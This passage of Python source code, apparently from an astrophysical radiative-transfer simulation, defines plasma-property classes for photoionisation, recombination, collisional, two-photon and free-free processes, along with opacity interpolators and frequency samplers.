integ = (np.diff(x) * (f[1:] + f[:-1]) / 2.0).cumsum()
return integ / integ[-1]
@njit(**njit_dict)
def cumulative_integrate_array_by_blocks(f, x, block_references):
"""
Cumulatively integrate a function over blocks.
This function cumulatively integrates a function `f` defined at
locations `x` over blocks given in `block_references`.
Parameters
----------
f : numpy.ndarray, dtype float
Input array to integrate. Shape is (N_freq, N_shells), where
N_freq is the number of frequency values and N_shells is the number
of computational shells.
x : numpy.ndarray, dtype float
The sample points corresponding to the `f` values. Shape is (N_freq,).
block_references : numpy.ndarray, dtype int
The start indices of the blocks to be integrated. Shape is (N_blocks,).
Returns
-------
numpy.ndarray, dtype float
Array with cumulatively integrated values. Shape is (N_freq, N_shells)
same as f.
"""
n_rows = len(block_references) - 1
integrated = np.zeros_like(f)
for i in prange(f.shape[1]): # columns
# TODO: Avoid this loop through vectorization of cumulative_trapezoid
for j in prange(n_rows): # rows
start = block_references[j]
stop = block_references[j + 1]
integrated[start + 1 : stop, i] = numba_cumulative_trapezoid(
f[start:stop, i], x[start:stop]
)
return integrated
def get_ion_multi_index(multi_index_full, next_higher=True):
"""
Calculate the corresponding ion MultiIndex for a level MultiIndex.
Parameters
----------
multi_index_full : pandas.MultiIndex (atomic_number, ion_number,
level_number)
next_higher : bool, default True
If True use ion number of next higher ion, else use ion_number from
multi_index_full.
Returns
-------
pandas.MultiIndex (atomic_number, ion_number)
Ion MultiIndex for the given level MultiIndex.
"""
atomic_number = multi_index_full.get_level_values(0)
ion_number = multi_index_full.get_level_values(1)
if next_higher is True:
ion_number += 1
return pd.MultiIndex.from_arrays([atomic_number, ion_number])
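# Illustrative example (not part of the original docstring): a level index
# entry (atomic_number=2, ion_number=0, level_number=5) maps to the ion index
# (2, 1) when next_higher is True, and to (2, 0) otherwise.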
def get_ground_state_multi_index(multi_index_full):
"""
Calculate the ground-state MultiIndex for the next higher ion.
Parameters
----------
multi_index_full : pandas.MultiIndex (atomic_number, ion_number,
level_number)
Returns
-------
pandas.MultiIndex (atomic_number, ion_number)
Ground-state MultiIndex for the next higher ion.
"""
atomic_number = multi_index_full.get_level_values(0)
ion_number = multi_index_full.get_level_values(1) + 1
level_number = np.zeros_like(ion_number)
return pd.MultiIndex.from_arrays([atomic_number, ion_number, level_number])
def cooling_rate_series2dataframe(cooling_rate_series, destination_level_idx):
"""
Transform cooling-rate Series to DataFrame.
This function transforms a Series with cooling rates into
an indexed DataFrame that can be used in MarkovChainTransProbs.
Parameters
----------
cooling_rate_series : pandas.Series, dtype float
Cooling rates for a process with a single destination idx.
Examples are adiabatic cooling or free-free cooling.
destination_level_idx : str
Destination idx of the cooling process; for example
'adiabatic' for adiabatic cooling.
Returns
-------
cooling_rate_frame : pandas.DataFrame, dtype float
Indexed by source_level_idx, destination_level_idx, transition_type
for the use in MarkovChainTransProbs.
"""
index_names = [
"source_level_idx",
"destination_level_idx",
"transition_type",
]
index = pd.MultiIndex.from_tuples(
[("k", destination_level_idx, -1)], names=index_names
)
cooling_rate_frame = pd.DataFrame(
cooling_rate_series.values[np.newaxis], index=index
)
return cooling_rate_frame
def bf_estimator_array2frame(bf_estimator_array, level2continuum_idx):
"""
Transform a bound-free estimator array to a DataFrame.
This function transforms a bound-free estimator array with entries
sorted by frequency to a multi-indexed DataFrame sorted by level.
Parameters
----------
bf_estimator_array : numpy.ndarray, dtype float
Array of bound-free estimators (e.g., for the stimulated recombination rate)
with entries sorted by the threshold frequency of the bound-free continuum.
level2continuum_idx : pandas.Series, dtype int
Maps a level MultiIndex (atomic_number, ion_number, level_number) to
the continuum_idx of the corresponding bound-free continuum (which are
sorted by decreasing frequency).
Returns
-------
pandas.DataFrame, dtype float
Bound-free estimators indexed by (atomic_number, ion_number, level_number).
"""
bf_estimator_frame = pd.DataFrame(
bf_estimator_array, index=level2continuum_idx.index
).sort_index()
bf_estimator_frame.columns.name = "Shell No."
return bf_estimator_frame
class IndexSetterMixin(object):
@staticmethod
def set_index(p, photo_ion_idx, transition_type=0, reverse=True):
idx = photo_ion_idx.loc[p.index]
transition_type = transition_type * np.ones_like(
idx.destination_level_idx
)
transition_type = pd.Series(transition_type, name="transition_type")
idx_arrays = [idx.source_level_idx, idx.destination_level_idx]
if reverse:
idx_arrays = idx_arrays[::-1]
idx_arrays.append(transition_type)
index = pd.MultiIndex.from_arrays(idx_arrays)
if reverse:
index.names = index.names[:-1][::-1] + [index.names[-1]]
p = p.set_index(index, drop=True)
return p
class SpontRecombRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
alpha_sp : pandas.DataFrame, dtype float
The rate coefficient for spontaneous recombination.
"""
outputs = ("alpha_sp",)
latex_name = (r"\alpha^{\textrm{sp}}",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
photo_ion_block_references,
photo_ion_index,
phi_ik,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
nu = photo_ion_cross_sections["nu"].values
alpha_sp = 8 * np.pi * x_sect * nu ** 2 / C ** 2
alpha_sp = alpha_sp[:, np.newaxis]
alpha_sp = alpha_sp * boltzmann_factor_photo_ion
alpha_sp = integrate_array_by_blocks(
alpha_sp, nu, photo_ion_block_references
)
alpha_sp = pd.DataFrame(alpha_sp, index=photo_ion_index)
return alpha_sp * phi_ik.loc[alpha_sp.index]
class SpontRecombCoolingRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
c_fb_sp : pandas.DataFrame, dtype float
The rate coefficient for cooling by
spontaneous recombination.
"""
outputs = ("c_fb_sp",)
latex_name = (r"c^{\textrm{sp}}_{\textrm{fb}}",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
photo_ion_block_references,
photo_ion_index,
phi_ik,
nu_i,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
nu = photo_ion_cross_sections["nu"].values
factor = (1 - nu_i / photo_ion_cross_sections["nu"]).values
alpha_sp = (8 * np.pi * x_sect * factor * nu ** 3 / C ** 2) * H
alpha_sp = alpha_sp[:, np.newaxis]
alpha_sp = alpha_sp * boltzmann_factor_photo_ion
alpha_sp = integrate_array_by_blocks(
alpha_sp, nu, photo_ion_block_references
)
alpha_sp = pd.DataFrame(alpha_sp, index=photo_ion_index)
return alpha_sp * phi_ik.loc[alpha_sp.index]
class FreeBoundEmissionCDF(ProcessingPlasmaProperty):
"""
Attributes
----------
fb_emission_cdf : pandas.DataFrame, dtype float
The cumulative distribution function (CDF) for the frequencies of
energy packets emitted in free-bound transitions. The tabulated CDF
is used to sample packet frequencies in the Monte Carlo simulation.
We use the same CDF for free-bound emission from k- and i-packets
(in contrast to ARTIS).
"""
outputs = ("fb_emission_cdf",)
latex_name = (r"P(\nu_{bf, emission}) \leq \nu)",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
photo_ion_block_references,
photo_ion_index,
nu_i,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
nu = photo_ion_cross_sections["nu"].values
# alpha_sp_E will be missing a lot of prefactors since we are only
# interested in relative values here
alpha_sp_E = nu ** 3 * x_sect
alpha_sp_E = alpha_sp_E[:, np.newaxis]
alpha_sp_E = alpha_sp_E * boltzmann_factor_photo_ion
alpha_sp_E = cumulative_integrate_array_by_blocks(
alpha_sp_E, nu, photo_ion_block_references
)
fb_emission_cdf = pd.DataFrame(
alpha_sp_E, index=photo_ion_cross_sections.index
)
return fb_emission_cdf
class PhotoIonRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
gamma : pandas.DataFrame, dtype float
The rate coefficient for radiative ionization.
"""
outputs = ("gamma",)
latex_name = (r"\gamma",)
def calculate(
self,
photo_ion_cross_sections,
gamma_estimator,
photo_ion_norm_factor,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
level2continuum_idx,
):
# Used for initialization
if gamma_estimator is None:
gamma = self.calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
)
else:
gamma_estimator = bf_estimator_array2frame(
gamma_estimator, level2continuum_idx
)
gamma = gamma_estimator * photo_ion_norm_factor.value
return gamma
@staticmethod
def calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
):
nu = photo_ion_cross_sections["nu"]
x_sect = photo_ion_cross_sections["x_sect"]
j_nus = JBluesDiluteBlackBody.calculate(
photo_ion_cross_sections, nu, t_rad, w
)
gamma = j_nus.multiply(4.0 * np.pi * x_sect / nu / H, axis=0)
gamma = integrate_array_by_blocks(
gamma.values, nu.values, photo_ion_block_references
)
gamma = pd.DataFrame(gamma, index=photo_ion_index)
return gamma
class StimRecombRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
alpha_stim : pandas.DataFrame, dtype float
The rate coefficient for stimulated recombination.
"""
outputs = ("alpha_stim",)
latex_name = (r"\alpha^{\textrm{stim}}",)
def calculate(
self,
photo_ion_cross_sections,
alpha_stim_estimator,
photo_ion_norm_factor,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
phi_ik,
t_electrons,
boltzmann_factor_photo_ion,
level2continuum_idx,
):
# Used for initialization
if alpha_stim_estimator is None:
alpha_stim = self.calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
t_electrons,
boltzmann_factor_photo_ion,
)
else:
alpha_stim_estimator = bf_estimator_array2frame(
alpha_stim_estimator, level2continuum_idx
)
alpha_stim = alpha_stim_estimator * photo_ion_norm_factor
alpha_stim *= phi_ik.loc[alpha_stim.index]
return alpha_stim
@staticmethod
def calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
t_electrons,
boltzmann_factor_photo_ion,
):
nu = photo_ion_cross_sections["nu"]
x_sect = photo_ion_cross_sections["x_sect"]
j_nus = JBluesDiluteBlackBody.calculate(
photo_ion_cross_sections, nu, t_rad, w
)
j_nus *= boltzmann_factor_photo_ion
alpha_stim = j_nus.multiply(4.0 * np.pi * x_sect / nu / H, axis=0)
alpha_stim = integrate_array_by_blocks(
alpha_stim.values, nu.values, photo_ion_block_references
)
alpha_stim = pd.DataFrame(alpha_stim, index=photo_ion_index)
return alpha_stim
class RawRecombTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_recomb : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
spontaneous recombination.
"""
outputs = ("p_recomb",)
transition_probabilities_outputs = ("p_recomb",)
latex_name = (r"p^{\textrm{recomb}}",)
def calculate(self, alpha_sp, nu_i, energy_i, photo_ion_idx):
p_recomb_deactivation = alpha_sp.multiply(nu_i, axis=0) * H
p_recomb_deactivation = self.set_index(
p_recomb_deactivation, photo_ion_idx, transition_type=-1
)
p_recomb_internal = alpha_sp.multiply(energy_i, axis=0)
p_recomb_internal = self.set_index(
p_recomb_internal, photo_ion_idx, transition_type=0
)
p_recomb = pd.concat([p_recomb_deactivation, p_recomb_internal])
return p_recomb
class RawPhotoIonTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_photo_ion : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
radiative ionization.
"""
outputs = ("p_photo_ion",)
transition_probabilities_outputs = ("p_photo_ion",)
latex_name = (r"p^{\textrm{photo_ion}}",)
def calculate(self, gamma_corr, energy_i, photo_ion_idx):
p_photo_ion = gamma_corr.multiply(energy_i, axis=0)
p_photo_ion = self.set_index(p_photo_ion, photo_ion_idx, reverse=False)
return p_photo_ion
class CorrPhotoIonRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
gamma_corr : pandas.DataFrame, dtype float
The rate coefficient for radiative ionization corrected for
stimulated recombination.
"""
outputs = ("gamma_corr",)
latex_name = (r"\gamma_\mathrm{corr}",)
def calculate(
self,
gamma,
alpha_stim,
electron_densities,
ion_number_density,
level_number_density,
):
n_k_index = get_ion_multi_index(alpha_stim.index)
n_k = ion_number_density.loc[n_k_index].values
n_i = level_number_density.loc[alpha_stim.index].values
gamma_corr = gamma - (alpha_stim * n_k / n_i).multiply(
electron_densities
)
num_neg_elements = (gamma_corr < 0).sum().sum()
if num_neg_elements:
raise PlasmaException("Negative values in CorrPhotoIonRateCoeff.")
return gamma_corr
class PhotoIonEstimatorsNormFactor(ProcessingPlasmaProperty):
outputs = ("photo_ion_norm_factor",)
latex_name = (r"\frac{1}{t_\textrm{simulation volume h}}",)
@staticmethod
def calculate(time_simulation, volume):
return (time_simulation * volume * H) ** -1
class PhotoIonRateCoeffEstimator(Input):
"""
Attributes
----------
gamma_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the rate coefficient for radiative
ionization.
"""
outputs = ("gamma_estimator",)
latex_name = (r"\gamma_\textrm{estim}",)
class StimRecombRateCoeffEstimator(Input):
"""
Attributes
----------
alpha_stim_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the rate coefficient for stimulated
recombination.
"""
outputs = ("alpha_stim_estimator",)
latex_name = (r"\alpha^{\textrm{stim}}_\textrm{estim}",)
class StimRecombCoolingRateCoeffEstimator(Input):
"""
Attributes
----------
stim_recomb_cooling_coeff_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the stimulated recombination cooling rate
coefficient.
"""
outputs = ("stim_recomb_cooling_coeff_estimator",)
class BfHeatingRateCoeffEstimator(Input):
"""
Attributes
----------
bf_heating_coeff_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the rate
coefficient for bound-free heating.
"""
outputs = ("bf_heating_coeff_estimator",)
latex_name = (r"h_\textrm{bf}_\textrm{estim}",)
class CollExcRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_exc_coeff : pandas.DataFrame, dtype float
Rate coefficient for collisional excitation.
"""
outputs = ("coll_exc_coeff",)
latex_name = ("c_{lu}",)
def calculate(self, yg_interp, yg_index, t_electrons, delta_E_yg):
yg = yg_interp(t_electrons)
boltzmann_factor = np.exp(
-delta_E_yg.values[np.newaxis].T / (t_electrons * K_B)
)
q_ij = (
BETA_COLL / np.sqrt(t_electrons) * yg * boltzmann_factor
        ) # see formula A2 in Przybilla, Butler 2004 - ApJ 609, 1181
return pd.DataFrame(q_ij, index=yg_index)
class CollDeexcRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_deexc_coeff : pandas.DataFrame, dtype float
Rate coefficient for collisional deexcitation.
"""
outputs = ("coll_deexc_coeff",)
latex_name = ("c_{ul}",)
def calculate(self, thermal_lte_level_boltzmann_factor, coll_exc_coeff):
level_lower_index = coll_exc_coeff.index.droplevel("level_number_upper")
level_upper_index = coll_exc_coeff.index.droplevel("level_number_lower")
n_lower_prop = thermal_lte_level_boltzmann_factor.loc[
level_lower_index
].values
n_upper_prop = thermal_lte_level_boltzmann_factor.loc[
level_upper_index
].values
coll_deexc_coeff = coll_exc_coeff * n_lower_prop / n_upper_prop
return coll_deexc_coeff
class RawCollisionTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_coll : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
collisional excitation.
"""
outputs = ("p_coll",)
transition_probabilities_outputs = ("p_coll",)
latex_name = (r"p^{\textrm{coll}}",)
def calculate(
self,
coll_exc_coeff,
coll_deexc_coeff,
yg_idx,
electron_densities,
delta_E_yg,
atomic_data,
level_number_density,
):
p_deexc_deactivation = (coll_deexc_coeff * electron_densities).multiply(
delta_E_yg.values, axis=0
)
p_deexc_deactivation = self.set_index(
p_deexc_deactivation, yg_idx, reverse=True
)
p_deexc_deactivation = p_deexc_deactivation.groupby(level=[0]).sum()
index_dd = pd.MultiIndex.from_product(
[p_deexc_deactivation.index.values, ["k"], [0]],
names=list(yg_idx.columns) + ["transition_type"],
)
p_deexc_deactivation = p_deexc_deactivation.set_index(index_dd)
level_lower_index = coll_deexc_coeff.index.droplevel(
"level_number_upper"
)
energy_lower = atomic_data.levels.energy.loc[level_lower_index]
p_deexc_internal = (coll_deexc_coeff * electron_densities).multiply(
energy_lower.values, axis=0
)
p_deexc_internal = self.set_index(
p_deexc_internal, yg_idx, transition_type=0, reverse=True
)
p_exc_internal = (coll_exc_coeff * electron_densities).multiply(
energy_lower.values, axis=0
)
p_exc_internal = self.set_index(
p_exc_internal, yg_idx, transition_type=0, reverse=False
)
p_exc_cool = (coll_exc_coeff * electron_densities).multiply(
delta_E_yg.values, axis=0
)
p_exc_cool = (
p_exc_cool * level_number_density.loc[level_lower_index].values
)
p_exc_cool = self.set_index(p_exc_cool, yg_idx, reverse=False)
p_exc_cool = p_exc_cool.groupby(level="destination_level_idx").sum()
exc_cool_index = pd.MultiIndex.from_product(
[["k"], p_exc_cool.index.values, [0]],
names=list(yg_idx.columns) + ["transition_type"],
)
p_exc_cool = p_exc_cool.set_index(exc_cool_index)
p_coll = pd.concat(
[p_deexc_deactivation, p_deexc_internal, p_exc_internal, p_exc_cool]
)
return p_coll
class RawTwoPhotonTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_two_photon : pandas.DataFrame, dtype float
The unnormalized transition probabilities for two photon decay.
"""
outputs = ("p_two_photon",)
transition_probabilities_outputs = ("p_two_photon",)
def calculate(self, two_photon_data, two_photon_idx, density):
no_shells = len(density)
p_two_phot = two_photon_data.A_ul * two_photon_data.nu0 * H
p_two_phot = pd.concat([p_two_phot] * no_shells, axis=1)
# TODO: In principle there could be internal two photon transitions
p_two_phot = self.set_index(
p_two_phot,
two_photon_idx,
transition_type=-1,
reverse=False,
)
p_two_phot.index = p_two_phot.index.set_levels(
["two-photon"], level="destination_level_idx"
)
return p_two_phot
class TwoPhotonEmissionCDF(ProcessingPlasmaProperty):
"""
Attributes
----------
two_photon_emission_cdf : pandas.DataFrame, dtype float
The cumulative distribution function (CDF) for the frequencies of
energy packets emitted in two photon transitions. The tabulated CDF
is used to sample packet frequencies in the Monte Carlo simulation.
"""
outputs = ("two_photon_emission_cdf",)
def calculate(self, two_photon_data):
bins = 500
# The number of two photon transitions is very small
# and the CDF has to be calculated only once.
# There is no need to vectorize the calculation.
emission_cdfs = []
for index, row in two_photon_data.iterrows():
alpha = row.alpha
beta = row.beta
gamma = row.gamma
nu = np.linspace(0.0, row.nu0, bins)
y = nu / row.nu0
j_nu = self.calculate_j_nu(y, alpha, beta, gamma)
cdf = np.zeros_like(nu)
cdf[1:] = numba_cumulative_trapezoid(j_nu, nu)
cdf /= cdf[-1]
index_cdf = pd.MultiIndex.from_tuples([index] * bins)
cdf = pd.DataFrame({"nu": nu, "cdf": cdf}, index=index_cdf)
emission_cdfs.append(cdf)
return pd.concat(emission_cdfs)
@staticmethod
def calculate_j_nu(y, alpha, beta, gamma):
"""
Calculate two photon emissivity.
This function calculates the two photon emissivity in the frequency
scale based on Eq. 2 and Eq. 3 in Nussbaumer & Schmutz (1984). The
emissivity is not normalized since it is only used to calculate
relative emission probabilities.
Parameters
----------
y : numpy.ndarray, dtype float
Emission frequency divided by that of the normal line
transition corresponding to the two photon decay.
alpha : float
Fit coefficient.
beta : float
Fit coefficient.
gamma : float
Fit coefficient.
Returns
-------
numpy.ndarray, dtype float
Unnormalized two photon emissivity in the frequency scale.
"""
ay = y * (1 - y) * (1 - (4 * y * (1 - y)) ** gamma)
ay += alpha * (y * (1 - y)) ** beta * (4 * y * (1 - y)) ** gamma
j_nu = ay * y
return j_nu
class AdiabaticCoolingRate(TransitionProbabilitiesProperty):
"""
Attributes
----------
cool_rate_adiabatic : pandas.DataFrame, dtype float
The adiabatic cooling rate of the electron gas.
"""
outputs = ("cool_rate_adiabatic",)
transition_probabilities_outputs = ("cool_rate_adiabatic",)
latex_name = (r"C_{\textrm{adiabatic}}",)
def calculate(self, electron_densities, t_electrons, time_explosion):
cool_rate_adiabatic = (
3.0 * electron_densities * K_B * t_electrons
) / time_explosion
cool_rate_adiabatic = cooling_rate_series2dataframe(
cool_rate_adiabatic, destination_level_idx="adiabatic"
)
return cool_rate_adiabatic
class FreeFreeCoolingRate(TransitionProbabilitiesProperty):
"""
Attributes
----------
cool_rate_ff : pandas.DataFrame, dtype float
The free-free cooling rate of the electron gas.
ff_cooling_factor : pandas.Series, dtype float
Pre-factor needed in the calculation of the free-free cooling rate and
the free-free opacity.
Notes
-----
This implementation uses a free-free Gaunt factor of one for all species
and ionization stages, which is an approximation.
"""
outputs = ("cool_rate_ff", "ff_cooling_factor")
transition_probabilities_outputs = ("cool_rate_ff",)
latex_name = (r"C^{\textrm{ff}}",)
def calculate(self, ion_number_density, electron_densities, t_electrons):
ff_cooling_factor = self._calculate_ff_cooling_factor(
ion_number_density, electron_densities
)
cool_rate_ff = F_K * np.sqrt(t_electrons) * ff_cooling_factor
cool_rate_ff = cooling_rate_series2dataframe(
cool_rate_ff, destination_level_idx="ff"
)
return cool_rate_ff, ff_cooling_factor.values
@staticmethod
def _calculate_ff_cooling_factor(ion_number_density, electron_densities):
ion_charge = ion_number_density.index.get_level_values(1).values
factor = (
electron_densities
* ion_number_density.multiply(ion_charge ** 2, axis=0).sum()
)
return factor
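# Sketch of the underlying relation (added comment, not original code): with
# a free-free Gaunt factor of one, the cooling rate computed above reduces to
#   C_ff = F_K * sqrt(T_e) * n_e * sum_i Z_i**2 * n_i,
# where F_K is the free-free emission constant, n_e the electron density and
# n_i the number density of ions with charge Z_i.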
class FreeFreeOpacity(ProcessingPlasmaProperty):
"""
Attributes
----------
    chi_ff_calculator : callable
        Numba-compiled function that returns the free-free opacity for a
        given comoving frequency and shell index.
"""
outputs = ("chi_ff_calculator",)
def calculate(self, t_electrons, ff_cooling_factor, electron_densities):
ff_opacity_factor = ff_cooling_factor / np.sqrt(t_electrons)
@njit(error_model="numpy", fastmath=True)
def chi_ff(nu, shell):
chi_ff = (
FF_OPAC_CONST
* ff_opacity_factor[shell]
/ nu ** 3
* (1 - np.exp(-H * nu / (K_B * t_electrons[shell])))
)
return chi_ff
return chi_ff
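# Note (added for clarity): the closure above evaluates a Kramers-like
# free-free opacity, chi_ff ~ nu**-3 * (1 - exp(-h nu / (k_B T_e))), where the
# exponential term corrects for stimulated emission.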
class FreeFreeFrequencySampler(ProcessingPlasmaProperty):
"""
Attributes
----------
    nu_ff_sampler : callable
        Samples a comoving frequency for the free-free emission process.
"""
outputs = ("nu_ff_sampler",)
def calculate(self, t_electrons):
@njit(error_model="numpy", fastmath=True)
def nu_ff(shell):
T = t_electrons[shell]
zrand = np.random.random()
return -K_B * T / H * np.log(zrand)
return nu_ff
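# Note (added for clarity): nu_ff draws from an exponential distribution with
# mean k_B * T_e / h, since -ln(z) of a uniform deviate z is exponentially
# distributed; this corresponds to sampling an emissivity proportional to
# exp(-h nu / (k_B T_e)) in the frequency scale.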
class FreeBoundFrequencySampler(ProcessingPlasmaProperty):
"""
Attributes
----------
    nu_fb_sampler : callable
        Samples a comoving frequency for the free-bound emission process.
"""
outputs = ("nu_fb_sampler",)
def calculate(
self, photo_ion_cross_sections, fb_emission_cdf, level2continuum_idx
):
phot_nus = photo_ion_cross_sections.nu.loc[level2continuum_idx.index]
photo_ion_block_references = np.pad(
phot_nus.groupby(level=[0, 1, 2], sort=False)
.count()
.values.cumsum(),
[1, 0],
)
phot_nus = phot_nus.values
emissivities = fb_emission_cdf.loc[level2continuum_idx.index].values
@njit(error_model="numpy", fastmath=True)
def nu_fb(shell, continuum_id):
start = photo_ion_block_references[continuum_id]
end = photo_ion_block_references[continuum_id + 1]
phot_nus_block = phot_nus[start:end]
em = emissivities[start:end, shell]
zrand = np.random.random()
idx = np.searchsorted(em, zrand, side="right")
return phot_nus_block[idx] - (em[idx] - zrand) / (
em[idx] - em[idx - 1]
) * (phot_nus_block[idx] - phot_nus_block[idx - 1])
return nu_fb
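# Note (added for clarity): nu_fb performs inverse-transform sampling of the
# tabulated free-bound emission CDF of one continuum: searchsorted locates the
# bracketing CDF values and the return statement linearly interpolates the
# frequency between them.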
class TwoPhotonFrequencySampler(ProcessingPlasmaProperty):
"""
Attributes
----------
    nu_two_photon_sampler : callable
        Samples a comoving frequency for the two-photon emission process.
"""
outputs = ("nu_two_photon_sampler",)
def calculate(self, two_photon_emission_cdf):
nus = two_photon_emission_cdf["nu"].values
em = two_photon_emission_cdf["cdf"].values
@njit(error_model="numpy", fastmath=True)
def nu_two_photon():
zrand = np.random.random()
idx = np.searchsorted(em, zrand, side="right")
return nus[idx] - (em[idx] - zrand) / (em[idx] - em[idx - 1]) * (
nus[idx] - nus[idx - 1]
)
return nu_two_photon
class FreeBoundCoolingRate(TransitionProbabilitiesProperty):
"""
Attributes
----------
    cool_rate_fb_tot : pandas.DataFrame, dtype float
        The total free-bound cooling rate of the electron gas.
    cool_rate_fb : pandas.DataFrame, dtype float
        The individual free-bound cooling rates of the electron gas.
    p_fb_deactivation : pandas.DataFrame, dtype float
        Probabilities of free-bound cooling in a specific continuum
        (identified by its continuum_idx).
"""
outputs = ("cool_rate_fb_tot", "cool_rate_fb", "p_fb_deactivation")
transition_probabilities_outputs = ("cool_rate_fb_tot",)
latex_name = (r"C^{\textrm{fb, tot}}", r"C^{\textrm{fb}}")
def calculate(
self,
c_fb_sp,
electron_densities,
ion_number_density,
level2continuum_idx,
):
next_ion_stage_index = get_ion_multi_index(c_fb_sp.index)
n_k = ion_number_density.loc[next_ion_stage_index]
cool_rate_fb = c_fb_sp.multiply(electron_densities, axis=1) * n_k.values
cool_rate_fb_tot = cooling_rate_series2dataframe(
cool_rate_fb.sum(axis=0), "bf"
)
p_fb_deactivation = cool_rate_fb / cool_rate_fb_tot.values
# TODO: this will be needed more often; put it in a function
continuum_idx = level2continuum_idx.loc[p_fb_deactivation.index].values
p_fb_deactivation = p_fb_deactivation.set_index(
continuum_idx
).sort_index(ascending=True)
p_fb_deactivation.index.name = "continuum_idx"
return cool_rate_fb_tot, cool_rate_fb, p_fb_deactivation
class BoundFreeOpacity(ProcessingPlasmaProperty):
"""
Attributes
----------
chi_bf : pandas.DataFrame, dtype float
Bound-free opacity corrected for stimulated emission.
"""
outputs = ("chi_bf",)
latex_name = (r"\chi^{\textrm{bf}}",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
phi_ik,
level_number_density,
lte_level_number_density,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
n_i = level_number_density.loc[photo_ion_cross_sections.index]
lte_n_i = lte_level_number_density.loc[photo_ion_cross_sections.index]
chi_bf = (n_i - lte_n_i * boltzmann_factor_photo_ion).multiply(
x_sect, axis=0
)
num_neg_elements = (chi_bf < 0).sum().sum()
if num_neg_elements:
raise PlasmaException("Negative values in bound-free opacity.")
return chi_bf
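# Sketch of the underlying relation (added comment, not original code): the
# bound-free opacity corrected for stimulated emission is
#   chi_bf = sigma_bf * (n_i - n_i_LTE * exp(-h nu / (k_B T_e))),
# a standard expression (see e.g. Hubeny & Mihalas 2014); the Boltzmann
# factor is precomputed in PhotoIonBoltzmannFactor.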
class BoundFreeOpacityInterpolator(ProcessingPlasmaProperty):
outputs = ("chi_bf_interpolator",)
def calculate(
self,
chi_bf,
photo_ion_cross_sections,
get_current_bound_free_continua,
level2continuum_idx,
):
        # Sort everything by descending frequency (i.e. continuum_id)
# TODO: Do we really gain much by sorting by continuum_id?
phot_nus = photo_ion_cross_sections.nu.loc[level2continuum_idx.index]
photo_ion_block_references = np.pad(
phot_nus.groupby(level=[0, 1, 2], sort=False)
.count()
.values.cumsum(),
[1, 0],
)
phot_nus = phot_nus.values
chi_bf = chi_bf.loc[level2continuum_idx.index].values
x_sect = photo_ion_cross_sections.x_sect.loc[
level2continuum_idx.index
].values
@njit(error_model="numpy", fastmath=True)
def chi_bf_interpolator(nu, shell):
"""
Interpolate the bound-free opacity.
This function interpolates the tabulated bound-free opacities
and cross-sections to new frequency values `nu`.
Parameters
----------
nu : float, dtype float
Comoving frequency of the r-packet.
shell : int, dtype float
Current computational shell.
Returns
-------
chi_bf_tot : float
Total bound-free opacity at frequency `nu`.
chi_bf_contributions : numpy.ndarray, dtype float
Cumulative distribution function of the contributions of the
individual bound free continua to the total bound-free opacity.
current_continua : numpy.ndarray, dtype int
Continuum ids for which absorption is possible for frequency `nu`.
x_sect_bfs : numpy.ndarray, dtype float
Photoionization cross-sections of all bound-free continua for
which absorption is possible for frequency `nu`.
"""
current_continua = get_current_bound_free_continua(nu)
chi_bfs = np.zeros(len(current_continua))
x_sect_bfs = np.zeros(len(current_continua))
for i, continuum_id in enumerate(current_continua):
start = photo_ion_block_references[continuum_id]
end = photo_ion_block_references[continuum_id + 1]
phot_nus_continuum = phot_nus[start:end]
nu_idx = np.searchsorted(phot_nus_continuum, nu)
                interval = phot_nus_continuum[nu_idx] - phot_nus_continuum[nu_idx - 1]
                high_weight = nu - phot_nus_continuum[nu_idx - 1]
                low_weight = phot_nus_continuum[nu_idx] - nu
                chi_bfs_continuum = chi_bf[start:end, shell]
                chi_bfs[i] = (
                    chi_bfs_continuum[nu_idx] * high_weight
                    + chi_bfs_continuum[nu_idx - 1] * low_weight
                ) / interval
                x_sect_bfs_continuum = x_sect[start:end]
                x_sect_bfs[i] = (
                    x_sect_bfs_continuum[nu_idx] * high_weight
                    + x_sect_bfs_continuum[nu_idx - 1] * low_weight
                ) / interval
chi_bf_contributions = chi_bfs.cumsum()
            # If the frequency lies outside the range for which we have
            # photoionization cross sections, there are no local continua,
            # no bound-free interactions can occur, and the bound-free
            # opacity is set to zero.
if len(current_continua) == 0:
chi_bf_tot = 0.0
else:
chi_bf_tot = chi_bf_contributions[-1]
chi_bf_contributions /= chi_bf_tot
return (
chi_bf_tot,
chi_bf_contributions,
current_continua,
x_sect_bfs,
)
return chi_bf_interpolator
